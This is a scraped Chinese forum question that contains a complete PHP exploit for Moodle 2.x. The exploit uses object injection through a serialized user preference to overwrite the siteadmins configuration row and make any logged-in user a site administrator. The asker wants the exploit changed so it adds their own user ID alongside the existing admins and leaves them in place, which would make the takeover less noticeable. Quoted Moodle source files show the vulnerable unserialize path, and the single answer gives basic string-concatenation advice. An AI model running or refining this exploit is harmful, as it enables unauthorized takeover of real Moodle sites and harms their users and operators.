php如何将整数添加到列中值的末尾

o75abkj4  于 2021-10-10  发布在  Java
关注(0)|答案(1)|浏览(2146)

我正在测试moodle系统2.x版。
要运行以下脚本,您需要在系统中拥有一个帐户(任何角色)。然后替换会话密钥、userid(都来自登录后的源代码)和moodlesession(来自cookie)。替换它们后,运行脚本并重新记录。
在这个漏洞中,有人可以用sql注入数据库
是否可以在表中的列中追加值的末尾,而不是替换整个值?
列中的值的格式为:1、2、3,这是用户标识。如何通过该脚本添加“,”和新值(整数)
我试过了 $value= $value .', 5' ; 正如gabri所建议的,但它仍然用一个空白和 , 5 下面的scrpipt基本上将用户ID设置为管理员,但会替换任何其他管理员。
是否可以不替换任何其他管理员,而将该用户ID也设置为管理员?

  1. <?php
  3. //defining the required classes for our exploit
  4. namespace gradereport_singleview\local\ui {
  5.     class feedback{   
  6.     }
  7. }
  9. namespace {
  10.     class gradereport_overview_external{
  11. }
  13. class grade_item{
  14. }
  16. class grade_grade{
  17. }
  19. // creating a simple httpPost method which requires php-curl
  20. function httpPost($url, $data, $MoodleSession, $json)
  21. {
  22.     $curl = curl_init($url);
  23.     $headers = array('Cookie: MoodleSession='.$MoodleSession);
  24.     if($json){
  25.         array_push($headers, 'Content-Type: application/json');
  26.     }else{
  27.         $data =  urldecode(http_build_query($data));
  28.     }
  29.     curl_setopt($curl, CURLOPT_POST, true);
  30.     curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
  31.     curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
  32.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  33.     // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy
  34.     $response = curl_exec($curl);
  35.     curl_close($curl);
  36.     return $response;
  37. }
  39. // creating a simple httpGet method which requires php-curl
  40. function httpGet($url, $MoodleSession)
  41. {
  42.     $curl = curl_init($url);
  43.     $headers = array('Cookie: MoodleSession='.$MoodleSession);
  44.     curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
  45.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  46.     // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy
  47.     $response = curl_exec($curl);
  48.     curl_close($curl);
  49.     return $response;
  50. }
  52. function update_table($url, $MoodleSession, $sesskey, $table, $rowId, $column, $value){
  53.     //first we create a gradereport_overview_external object because it is supported by the Moodle autoloader and it includes the grade_grade and grade_item classes that we are going to need
  54.     $base = new gradereport_overview_external();
  56.     // now we create the feedback object which inherits the vulnerable __tostring() method from its parent
  57.     $fb = new gradereport_singleview\local\ui\feedback();
  59.     //filling the feedback object with the required properties for the exploit to work
  60.     $fb -> grade = new grade_grade();
  61.     $fb -> grade -> grade_item = new grade_item();
  62.     $fb -> grade -> grade_item -> calculation = "[[somestring";
  63.     $fb -> grade -> grade_item -> calculation_normalized = false;
  65.     //setting the table which we want to alter
  66.     $fb -> grade -> grade_item -> table = $table;
  67.     //setting the row id of the row that we want to alter
  68.     $fb -> grade -> grade_item -> id = $rowId;
  69.     //setting the column with the value that we want to insert
  70.     $fb -> grade -> grade_item -> $column = $value;
  71.     $fb -> grade -> grade_item -> required_fields = array($column,'id');
  73.     //creating the array with our base object (which itself is included in an array because the base object has no __tostring() method) and our payload object
  74.     $arr = array(array($base),$fb);
  76.     //serializing the array
  77.     $value = serialize($arr);
  79.     //we'll set the course_blocks sortorder to 0 so we default to legacy user preference
  80.     $data = array('sesskey' => $sesskey, 'sortorder[]' => 0);
  81.     httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);
  83.     //injecting the payload
  84.     $data = json_encode(array(array('index'=> 0, 'methodname'=>'core_user_update_user_preferences','args'=>array('preferences'=>array(array('type'=> 'course_overview_course_order', 'value' => $value))))));
  85.     httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1);
  87.     //getting the frontpage so the payload will activate
  88.     httpGet($url.'/my/', $MoodleSession);
  89.     }
  91. $url = ''; //url of the Moodle site
  92. $MoodleSession = ''; //your MoodleSession cookie value
  93. $sesskey = ''; //your sesskey
  95. $table = "config"; //table to update 
  96. $rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter. could vary from installation to installation
  97. $column = 'value'; //column name to update, which holds the userid
  98. $value = 3; // userid to set as 'siteadmins' 
  100. update_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value);
  102. //reset the allversionshash config entry with a sha1 hash so the site reloads its configuration
  103. $rowId = 375; // row id of 'allversionshash' parameter
  104. update_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time()));
  106. //reset the sortorder so we can see the front page again without the payload triggering
  107. $data = array('sesskey' => $sesskey, 'sortorder[]' => 1);
  108. httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);
  110. //force plugincheck so we can access admin panel
  111. httpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession);
  113. }
  114. ?>

以下文件是moodle资源(无法更改)
save.php

  1. <?php
  2. // This file is part of Moodle - http://moodle.org/
  3. //
  4. // Moodle is free software: you can redistribute it and/or modify
  5. // it under the terms of the GNU General Public License as published by
  6. // the Free Software Foundation, either version 3 of the License, or
  7. // (at your option) any later version.
  8. //
  9. // Moodle is distributed in the hope that it will be useful,
  10. // but WITHOUT ANY WARRANTY; without even the implied warranty of
  11. // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12. // GNU General Public License for more details.
  13. //
  14. // You should have received a copy of the GNU General Public License
  15. // along with Moodle.  If not, see <http://www.gnu.org/licenses/>.
  17. /**
  18.  * Save course order in course_overview block
  19.  *
  20.  * @package    block_course_overview
  21.  * @copyright  2012 Adam Olley <adam.olley@netspot.com.au>
  22.  * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
  23.  */
  24. define('AJAX_SCRIPT', true);
  26. require_once(__DIR__ . '/../../config.php');
  27. require_once(__DIR__ . '/locallib.php');
  29. require_sesskey();
  30. require_login();
  32. $sortorder = required_param_array('sortorder', PARAM_INT);
  34. block_course_overview_update_myorder($sortorder);

locallib.php

  1. <?php
  2. // This file is part of Moodle - http://moodle.org/
  3. //
  4. // Moodle is free software: you can redistribute it and/or modify
  5. // it under the terms of the GNU General Public License as published by
  6. // the Free Software Foundation, either version 3 of the License, or
  7. // (at your option) any later version.
  8. //
  9. // Moodle is distributed in the hope that it will be useful,
  10. // but WITHOUT ANY WARRANTY; without even the implied warranty of
  11. // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12. // GNU General Public License for more details.
  13. //
  14. // You should have received a copy of the GNU General Public License
  15. // along with Moodle.  If not, see <http://www.gnu.org/licenses/>.
  17. /**
  18.  * Helper functions for course_overview block
  19.  *
  20.  * @package    block_course_overview
  21.  * @copyright  2012 Adam Olley <adam.olley@netspot.com.au>
  22.  * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
  23.  */
  25. define('BLOCKS_COURSE_OVERVIEW_SHOWCATEGORIES_NONE', '0');
  26. define('BLOCKS_COURSE_OVERVIEW_SHOWCATEGORIES_ONLY_PARENT_NAME', '1');
  27. define('BLOCKS_COURSE_OVERVIEW_SHOWCATEGORIES_FULL_PATH', '2');
  29. /**
  30.  * Display overview for courses
  31.  *
  32.  * @param array $courses courses for which overview needs to be shown
  33.  * @return array html overview
  34.  */
  35. function block_course_overview_get_overviews($courses) {
  36.     $htmlarray = array();
  37.     if ($modules = get_plugin_list_with_function('mod', 'print_overview')) {
  38.         // Split courses list into batches with no more than MAX_MODINFO_CACHE_SIZE courses in one batch.
  39.         // Otherwise we exceed the cache limit in get_fast_modinfo() and rebuild it too often.
  40.         if (defined('MAX_MODINFO_CACHE_SIZE') && MAX_MODINFO_CACHE_SIZE > 0 && count($courses) > MAX_MODINFO_CACHE_SIZE) {
  41.             $batches = array_chunk($courses, MAX_MODINFO_CACHE_SIZE, true);
  42.         } else {
  43.             $batches = array($courses);
  44.         }
  45.         foreach ($batches as $courses) {
  46.             foreach ($modules as $fname) {
  47.                 $fname($courses, $htmlarray);
  48.             }
  49.         }
  50.     }
  51.     return $htmlarray;
  52. }
  54. /**
  55.  * Sets user preference for maximum courses to be displayed in course_overview block
  56.  *
  57.  * @param int $number maximum courses which should be visible
  58.  */
  59. function block_course_overview_update_mynumber($number) {
  60.     set_user_preference('course_overview_number_of_courses', $number);
  61. }
  63. /**
  64.  * Sets user course sorting preference in course_overview block
  65.  *
  66.  * @param array $sortorder list of course ids
  67.  */
  68. function block_course_overview_update_myorder($sortorder) {
  69.     $value = implode(',', $sortorder);
  70.     if (core_text::strlen($value) > 1333) {
  71.         // The value won't fit into the user preference. Remove courses in the end of the list (mostly likely user won't even notice).
  72.         $value = preg_replace('/,[\d]*$/', '', core_text::substr($value, 0, 1334));
  73.     }
  74.     set_user_preference('course_overview_course_sortorder', $value);
  75. }
  77. /**
  78.  * Gets user course sorting preference in course_overview block
  79.  *
  80.  * @return array list of course ids
  81.  */
  82. function block_course_overview_get_myorder() {
  83.     if ($value = get_user_preferences('course_overview_course_sortorder')) {
  84.         return explode(',', $value);
  85.     }
  86.     // If preference was not found, look in the old location and convert if found.
  87.     $order = array();
  88.     if ($value = get_user_preferences('course_overview_course_order')) {
  89.         $order = unserialize($value);
  90.         block_course_overview_update_myorder($order);
  91.         unset_user_preference('course_overview_course_order');
  92.     }
  93.     return $order;
  94. }
  96. /**
  97.  * Returns shortname of activities in course
  98.  *
  99.  * @param int $courseid id of course for which activity shortname is needed
  100.  * @return string|bool list of child shortname
  101.  */
  102. function block_course_overview_get_child_shortnames($courseid) {
  103.     global $DB;
  104.     $ctxselect = context_helper::get_preload_record_columns_sql('ctx');
  105.     $sql = "SELECT c.id, c.shortname, $ctxselect
  106.             FROM {enrol} e
  107.             JOIN {course} c ON (c.id = e.customint1)
  108.             JOIN {context} ctx ON (ctx.instanceid = e.customint1)
  109.             WHERE e.courseid = :courseid AND e.enrol = :method AND ctx.contextlevel = :contextlevel ORDER BY e.sortorder";
  110.     $params = array('method' => 'meta', 'courseid' => $courseid, 'contextlevel' => CONTEXT_COURSE);
  112.     if ($results = $DB->get_records_sql($sql, $params)) {
  113.         $shortnames = array();
  114.         // Preload the context we will need it to format the category name shortly.
  115.         foreach ($results as $res) {
  116.             context_helper::preload_from_record($res);
  117.             $context = context_course::instance($res->id);
  118.             $shortnames[] = format_string($res->shortname, true, $context);
  119.         }
  120.         $total = count($shortnames);
  121.         $suffix = '';
  122.         if ($total > 10) {
  123.             $shortnames = array_slice($shortnames, 0, 10);
  124.             $diff = $total - count($shortnames);
  125.             if ($diff > 1) {
  126.                 $suffix = get_string('shortnamesufixprural', 'block_course_overview', $diff);
  127.             } else {
  128.                 $suffix = get_string('shortnamesufixsingular', 'block_course_overview', $diff);
  129.             }
  130.         }
  131.         $shortnames = get_string('shortnameprefix', 'block_course_overview', implode('; ', $shortnames));
  132.         $shortnames .= $suffix;
  133.     }
  135.     return isset($shortnames) ? $shortnames : false;
  136. }
  138. /**
  139.  * Returns maximum number of courses which will be displayed in course_overview block
  140.  *
  141.  * @param bool $showallcourses if set true all courses will be visible.
  142.  * @return int maximum number of courses
  143.  */
  144. function block_course_overview_get_max_user_courses($showallcourses = false) {
  145.     // Get block configuration
  146.     $config = get_config('block_course_overview');
  147.     $limit = $config->defaultmaxcourses;
  149.     // If max course is not set then try get user preference
  150.     if (empty($config->forcedefaultmaxcourses)) {
  151.         if ($showallcourses) {
  152.             $limit = 0;
  153.         } else {
  154.             $limit = get_user_preferences('course_overview_number_of_courses', $limit);
  155.         }
  156.     }
  157.     return $limit;
  158. }
  160. /**
  161.  * Return sorted list of user courses
  162.  *
  163.  * @param bool $showallcourses if set true all courses will be visible.
  164.  * @return array list of sorted courses and count of courses.
  165.  */
  166. function block_course_overview_get_sorted_courses($showallcourses = false) {
  167.     global $USER;
  169.     $limit = block_course_overview_get_max_user_courses($showallcourses);
  171.     $courses = enrol_get_my_courses();
  172.     $site = get_site();
  174.     if (array_key_exists($site->id,$courses)) {
  175.         unset($courses[$site->id]);
  176.     }
  178.     foreach ($courses as $c) {
  179.         if (isset($USER->lastcourseaccess[$c->id])) {
  180.             $courses[$c->id]->lastaccess = $USER->lastcourseaccess[$c->id];
  181.         } else {
  182.             $courses[$c->id]->lastaccess = 0;
  183.         }
  184.     }
  186.     // Get remote courses.
  187.     $remotecourses = array();
  188.     if (is_enabled_auth('mnet')) {
  189.         $remotecourses = get_my_remotecourses();
  190.     }
  191.     // Remote courses will have -ve remoteid as key, so it can be differentiated from normal courses
  192.     foreach ($remotecourses as $id => $val) {
  193.         $remoteid = $val->remoteid * -1;
  194.         $val->id = $remoteid;
  195.         $courses[$remoteid] = $val;
  196.     }
  198.     $order = block_course_overview_get_myorder();
  200.     $sortedcourses = array();
  201.     $counter = 0;
  202.     // Get courses in sort order into list.
  203.     foreach ($order as $key => $cid) {
  204.         if (($counter >= $limit) && ($limit != 0)) {
  205.             break;
  206.         }
  208.         // Make sure user is still enroled.
  209.         if (isset($courses[$cid])) {
  210.             $sortedcourses[$cid] = $courses[$cid];
  211.             $counter++;
  212.         }
  213.     }
  214.     // Append unsorted courses if limit allows
  215.     foreach ($courses as $c) {
  216.         if (($limit != 0) && ($counter >= $limit)) {
  217.             break;
  218.         }
  219.         if (!in_array($c->id, $order)) {
  220.             $sortedcourses[$c->id] = $c;
  221.             $counter++;
  222.         }
  223.     }
  225.     // From list extract site courses for overview
  226.     $sitecourses = array();
  227.     foreach ($sortedcourses as $key => $course) {
  228.         if ($course->id > 0) {
  229.             $sitecourses[$key] = $course;
  230.         }
  231.     }
  232.     return array($sortedcourses, $sitecourses, count($courses));
  233. }

block_course_overview.php

  1. <?php
  2. // This file is part of Moodle - http://moodle.org/
  3. //
  4. // Moodle is free software: you can redistribute it and/or modify
  5. // it under the terms of the GNU General Public License as published by
  6. // the Free Software Foundation, either version 3 of the License, or
  7. // (at your option) any later version.
  8. //
  9. // Moodle is distributed in the hope that it will be useful,
  10. // but WITHOUT ANY WARRANTY; without even the implied warranty of
  11. // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12. // GNU General Public License for more details.
  13. //
  14. // You should have received a copy of the GNU General Public License
  15. // along with Moodle.  If not, see <http://www.gnu.org/licenses/>.
  17. /**
  18.  * Course overview block
  19.  *
  20.  * @package    block_course_overview
  21.  * @copyright  1999 onwards Martin Dougiamas (http://dougiamas.com)
  22.  * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
  23.  */
  24. require_once($CFG->dirroot.'/blocks/course_overview/locallib.php');
  26. /**
  27.  * Course overview block
  28.  *
  29.  * @copyright  1999 onwards Martin Dougiamas (http://dougiamas.com)
  30.  * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
  31.  */
  32. class block_course_overview extends block_base {
  33.     /**
  34.      * If this is passed as mynumber then showallcourses, irrespective of limit by user.
  35.      */
  36.     const SHOW_ALL_COURSES = -2;
  38.     /**
  39.      * Block initialization
  40.      */
  41.     public function init() {
  42.         $this->title   = get_string('pluginname', 'block_course_overview');
  43.     }
  45.     /**
  46.      * Return contents of course_overview block
  47.      *
  48.      * @return stdClass contents of block
  49.      */
  50.     public function get_content() {
  51.         global $USER, $CFG, $DB;
  52.         require_once($CFG->dirroot.'/user/profile/lib.php');
  54.         if($this->content !== NULL) {
  55.             return $this->content;
  56.         }
  58.         $config = get_config('block_course_overview');
  60.         $this->content = new stdClass();
  61.         $this->content->text = '';
  62.         $this->content->footer = '';
  64.         $content = array();
  66.         $updatemynumber = optional_param('mynumber', -1, PARAM_INT);
  67.         if ($updatemynumber >= 0) {
  68.             block_course_overview_update_mynumber($updatemynumber);
  69.         }
  71.         profile_load_custom_fields($USER);
  73.         $showallcourses = ($updatemynumber === self::SHOW_ALL_COURSES);
  74.         list($sortedcourses, $sitecourses, $totalcourses) = block_course_overview_get_sorted_courses($showallcourses);
  75.         $overviews = block_course_overview_get_overviews($sitecourses);
  77.         $renderer = $this->page->get_renderer('block_course_overview');
  78.         if (!empty($config->showwelcomearea)) {
  79.             require_once($CFG->dirroot.'/message/lib.php');
  80.             $msgcount = message_count_unread_messages();
  81.             $this->content->text = $renderer->welcome_area($msgcount);
  82.         }
  84.         // Number of sites to display.
  85.         if ($this->page->user_is_editing() && empty($config->forcedefaultmaxcourses)) {
  86.             $this->content->text .= $renderer->editing_bar_head($totalcourses);
  87.         }
  89.         if (empty($sortedcourses)) {
  90.             $this->content->text .= get_string('nocourses','my');
  91.         } else {
  92.             // For each course, build category cache.
  93.             $this->content->text .= $renderer->course_overview($sortedcourses, $overviews);
  94.             $this->content->text .= $renderer->hidden_courses($totalcourses - count($sortedcourses));
  95.         }
  97.         return $this->content;
  98.     }
  100.     /**
  101.      * Allow the block to have a configuration page
  102.      *
  103.      * @return boolean
  104.      */
  105.     public function has_config() {
  106.         return true;
  107.     }
  109.     /**
  110.      * Locations where block can be displayed
  111.      *
  112.      * @return array
  113.      */
  114.     public function applicable_formats() {
  115.         return array('my' => true);
  116.     }
  118.     /**
  119.      * Sets block header to be hidden or visible
  120.      *
  121.      * @return bool if true then header will be visible.
  122.      */
  123.     public function hide_header() {
  124.         // Hide header if welcome area is show.
  125.         $config = get_config('block_course_overview');
  126.         return !empty($config->showwelcomearea);
  127.     }
  128. }
sqlmysqlphpmariadbsql-injection

1条答案

按热度按时间
5tmbdcev

5tmbdcev1#

在php中不能使用“+”来连接,需要使用点。
例如:

  1. echo "Hello" + "World";  //Won't work
  2. echo "Hello" . "World"; //Correct approach

也许这是可行的,但很难说没有看到完整的问题。

  1. $value= $value .', 5';
赞(0)分享  回复(0)举报  2021-10-10
我来回答

相关问题

    查看更多

    热门标签

    更多
    JavaquerypythonNode开发语言requestUtil数据库Table后端算法LoggerMessageElementParser

    最新问答

    更多
    • 蜀ICP备13028337号-1 大数据知识库 https://www.saoniuhuo.com © All rights reserved
    • 本站内容来源互联网,如果侵犯您的权益请联系我们删除, 联系方式:448109455@qq.com